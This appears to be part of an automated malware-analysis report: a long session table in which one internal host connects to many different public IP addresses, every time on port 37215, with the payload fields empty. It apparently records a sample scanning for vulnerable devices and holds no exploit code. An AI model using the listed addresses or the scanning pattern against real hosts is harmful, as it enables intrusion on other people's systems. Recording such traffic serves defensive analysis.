                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14606192.168.2.2341940109.48.147.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14607192.168.2.235797641.97.255.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14608192.168.2.2360224157.207.53.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14609192.168.2.234533841.172.26.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14610192.168.2.2347042157.189.68.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14611192.168.2.235711441.231.38.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14612192.168.2.234792441.81.237.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14613192.168.2.2350786157.136.185.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14614192.168.2.2339804157.41.68.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14615192.168.2.234730641.189.186.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14616192.168.2.235708241.153.94.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14617192.168.2.2340002196.80.112.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14618192.168.2.2341114133.216.61.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14619192.168.2.2339078197.10.112.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14620192.168.2.2345824197.205.253.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14621192.168.2.233383041.114.255.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14622192.168.2.235517284.146.195.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14623192.168.2.2342122157.209.161.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14624192.168.2.233541071.167.180.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14625192.168.2.2355724170.120.128.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14626192.168.2.2349324197.179.149.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14627192.168.2.2347670157.18.190.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14628192.168.2.2339212197.254.42.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14629192.168.2.234500441.166.53.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14630192.168.2.2347956181.132.224.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14631192.168.2.2343566197.48.92.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14632192.168.2.2339588197.8.99.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14633192.168.2.2357802119.35.188.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14634192.168.2.235074441.76.187.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14635192.168.2.235121065.69.189.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14636192.168.2.2346162157.252.7.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14637192.168.2.2356778197.141.19.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14638192.168.2.2334308197.233.233.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14639192.168.2.233887241.34.117.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14640192.168.2.2359106197.223.71.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14641192.168.2.233844841.112.251.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14642192.168.2.234460641.190.104.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14643192.168.2.2334434197.248.64.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14644192.168.2.233548648.196.65.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14645192.168.2.2349024197.33.118.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14646192.168.2.2342592157.201.99.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14647192.168.2.2332808197.66.229.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14648192.168.2.2347224197.254.246.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14649192.168.2.2344400197.193.115.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14650192.168.2.2338288197.62.91.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14651192.168.2.2340096157.209.218.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14652192.168.2.2349578157.3.68.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14653192.168.2.235467847.92.83.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14654192.168.2.2354782157.155.126.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14655192.168.2.2342680204.150.199.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14656192.168.2.235046441.197.111.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14657192.168.2.234500441.145.134.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14658192.168.2.2352896197.209.175.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14659192.168.2.233969841.151.101.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14660192.168.2.2335880157.126.156.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14661192.168.2.2352112157.137.14.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14662192.168.2.234939841.194.217.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14663192.168.2.236069641.154.55.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14664192.168.2.2333352161.165.204.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14665192.168.2.234982641.125.166.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14666192.168.2.2356962197.144.10.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14667192.168.2.235414489.198.82.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14668192.168.2.2355832157.185.129.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14669192.168.2.23606984.29.115.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14670192.168.2.235394641.56.171.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14671192.168.2.234160441.206.232.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14672192.168.2.2348318157.82.97.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14673192.168.2.2351920157.124.190.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14674192.168.2.2333372197.52.184.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14675192.168.2.235391075.135.18.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14676192.168.2.233431641.246.222.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14677192.168.2.235722631.65.184.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14678192.168.2.233677841.14.15.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14679192.168.2.2344318157.237.223.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14680192.168.2.234044641.75.34.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14681192.168.2.2358262131.51.18.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14682192.168.2.234942041.89.248.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14683192.168.2.2336966157.181.123.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14684192.168.2.2352488157.67.131.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14685192.168.2.2346992197.147.63.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14686192.168.2.2352492157.38.143.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14687192.168.2.2351526157.106.211.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14688192.168.2.2355824197.103.13.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14689192.168.2.2352170197.72.53.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14690192.168.2.2352144157.162.227.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14691192.168.2.235991041.182.141.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14692192.168.2.2334592203.30.111.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14693192.168.2.233939641.90.176.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14694192.168.2.2348608157.253.157.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14695192.168.2.2360286157.1.54.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14696192.168.2.235676832.21.52.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14697192.168.2.234188641.14.215.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14698192.168.2.2359066199.162.161.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14699192.168.2.234424241.107.171.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14700192.168.2.2341046197.212.165.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14701192.168.2.235665041.2.102.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14702192.168.2.2349282157.3.54.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14703192.168.2.234424241.149.32.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14704192.168.2.2333320197.72.181.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14705192.168.2.233824241.152.157.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14706192.168.2.2360896157.128.105.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14707192.168.2.2336404157.234.136.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14708192.168.2.234402441.153.217.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14709192.168.2.2334982157.239.71.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14710192.168.2.2346484197.209.216.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14711192.168.2.2352482197.172.191.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14712192.168.2.2337828197.38.225.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14713192.168.2.2349360197.67.226.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14714192.168.2.2360138197.120.134.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14715192.168.2.2340090157.52.42.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14716192.168.2.233768241.130.173.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14717192.168.2.234752641.155.180.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14718192.168.2.2349204197.102.178.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14719192.168.2.2335612216.94.216.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14720192.168.2.2345556157.12.221.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14721192.168.2.235798289.242.81.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14722192.168.2.234855244.29.69.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14723192.168.2.2346886197.6.111.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14724192.168.2.2352492197.134.232.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14725192.168.2.235646241.176.6.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14726192.168.2.234076841.90.242.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14727192.168.2.2338742197.7.241.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14728192.168.2.236037041.226.39.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14729192.168.2.2334300197.125.9.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14730192.168.2.233413076.93.197.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14731192.168.2.2340452202.249.117.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14732192.168.2.235014641.70.133.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14733192.168.2.2334294161.10.143.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14734192.168.2.2353828197.183.39.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14735192.168.2.235504441.109.238.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14736192.168.2.2346744165.155.24.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14737192.168.2.235892441.104.179.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14738192.168.2.234971441.58.70.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14739192.168.2.2357518157.113.114.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14740192.168.2.2353464157.240.116.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14741192.168.2.234473641.250.246.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14742192.168.2.2333826197.229.213.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14743192.168.2.234731071.179.95.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14744192.168.2.233666641.116.148.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14745192.168.2.2340106149.112.109.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14746192.168.2.233792441.191.162.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14747192.168.2.235050689.108.225.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14748192.168.2.2345996197.163.105.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14749192.168.2.2354702157.217.83.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14750192.168.2.2338414107.145.29.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14751192.168.2.2355716197.84.42.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14752192.168.2.2342776157.239.58.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14753192.168.2.2333830197.102.139.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14754192.168.2.2336134180.159.39.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14755192.168.2.2342228157.16.248.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14756192.168.2.233704241.209.158.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14757192.168.2.2338590157.202.41.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14758192.168.2.2333216164.36.229.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14759192.168.2.2338110112.77.155.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14760192.168.2.234331627.23.66.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14761192.168.2.2358884157.246.62.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14762192.168.2.2347602197.217.86.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14763192.168.2.235193841.187.130.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14764192.168.2.234036441.45.186.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14765192.168.2.233651841.73.83.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14766192.168.2.235529041.210.171.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14767192.168.2.235201832.25.93.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14768192.168.2.2351952197.24.72.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14769192.168.2.2339138157.244.73.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14770192.168.2.2353494173.94.191.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14771192.168.2.2360058197.221.30.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14772192.168.2.235992438.58.70.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14773192.168.2.2343114197.243.43.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14774192.168.2.235075641.126.148.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14775192.168.2.2348200221.251.110.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14776192.168.2.235581441.92.247.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14777192.168.2.235380041.173.70.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14778192.168.2.2358510157.204.74.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14779192.168.2.235305414.247.200.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14780192.168.2.2354070197.136.96.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14781192.168.2.2337356100.35.81.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14782192.168.2.2342212197.68.229.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14783192.168.2.2356934197.111.97.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14784192.168.2.2333016197.172.123.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14785192.168.2.234688041.141.178.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14786192.168.2.2347236197.53.145.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14787192.168.2.2354170111.124.217.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14788192.168.2.234297041.208.220.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14789192.168.2.2334692157.21.67.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14790192.168.2.2355582157.131.120.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14791192.168.2.2348794197.188.15.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14792192.168.2.2358630157.22.144.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14793192.168.2.233843641.245.215.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14794192.168.2.23502729.239.83.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14795192.168.2.2360480197.164.188.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14796192.168.2.233470641.229.34.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14797192.168.2.2339454197.55.138.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14798192.168.2.2347248197.47.11.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14799192.168.2.2350504197.204.105.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14800192.168.2.2358040197.20.90.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14801192.168.2.2340802157.243.110.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14802192.168.2.2333388197.61.210.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14803192.168.2.236082241.23.186.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14804192.168.2.2347462157.187.113.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14805192.168.2.234764441.241.228.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14806192.168.2.2337436157.98.215.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14807192.168.2.2336382194.242.4.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14808192.168.2.2342522157.176.24.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14809192.168.2.233822641.168.253.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14810192.168.2.233607441.33.205.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14811192.168.2.2349600197.222.34.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14812192.168.2.2332930197.145.108.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14813192.168.2.233900241.120.220.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14814192.168.2.2350126157.180.18.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14815192.168.2.2345526197.228.235.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14816192.168.2.2353352177.201.246.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14817192.168.2.235660841.163.57.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14818192.168.2.2339968157.29.207.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14819192.168.2.2345386197.97.208.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14820192.168.2.233306041.71.5.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14821192.168.2.2336762197.172.221.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14822192.168.2.2348762197.174.158.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14823192.168.2.2340390157.51.18.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
